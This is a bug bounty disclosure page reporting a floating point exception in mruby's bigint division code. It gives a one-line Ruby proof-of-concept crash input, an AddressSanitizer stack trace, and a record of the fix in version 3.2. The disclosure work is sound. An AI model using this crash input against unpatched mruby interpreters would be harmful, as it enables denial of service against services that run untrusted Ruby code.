Floating point exception in mruby/mruby

Valid

Reported on

Aug 24th 2022


Description

Floating point exception in udiv()

commit : b83285697888abbcb2286462da070d49f413ab24

Proof of Concept

(1 << 63).pow(1, 0)

ASAN Output

=================================================================
==747==ERROR: AddressSanitizer: FPE on unknown address 0x5626e07f6dba (pc 0x5626e07f6dba bp 0x6020000030b8 sp 0x7ffdcd994ab0 T0)
    #0 0x5626e07f6db9 in udiv /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:470
    #1 0x5626e07f8072 in mpz_mod /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:597
    #2 0x5626e07f885b in mpz_powm /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:967
    #3 0x5626e0800323 in mrb_bint_powm /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:1385
    #4 0x5626e0899700 in int_powm /home/bottom/fuzz/mruby/mrbgems/mruby-numeric-ext/src/numeric_ext.c:71
    #5 0x5626e075dd81 in mrb_vm_exec /home/bottom/fuzz/mruby/src/vm.c:1750
    #6 0x5626e0784ad2 in mrb_vm_run /home/bottom/fuzz/mruby/src/vm.c:1226
    #7 0x5626e0849b76 in mrb_load_exec mrbgems/mruby-compiler/core/parse.y:6912
    #8 0x5626e084f57c in mrb_load_detect_file_cxt mrbgems/mruby-compiler/core/parse.y:6955
    #9 0x5626e071a2eb in main /home/bottom/fuzz/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:357
    #10 0x7f71a3a0c0b2 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x270b2)
    #11 0x5626e071c11d in _start (/ctf/mruby_asan+0xc411d)

AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: FPE /home/bottom/fuzz/mruby/mrbgems/mruby-bigint/core/bigint.c:470 in udiv
==747==ABORTING

Test Platform

Ubuntu 20.04.4 LTS

Impact

Denial of Service

We are processing your report and will contact the mruby team within 24 hours. 3 months ago
bottom modified the report
3 months ago
We have contacted a member of the mruby team and are waiting to hear back 3 months ago
Yukihiro "Matz" Matsumoto validated this vulnerability 3 months ago
bottom has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Yukihiro "Matz" Matsumoto marked this as fixed in 3.2 with commit ef1974 3 months ago
Yukihiro "Matz" Matsumoto has been awarded the fix bounty
This vulnerability will not receive a CVE
bottom
3 months ago

Researcher


Is there cve id for it?

to join this conversation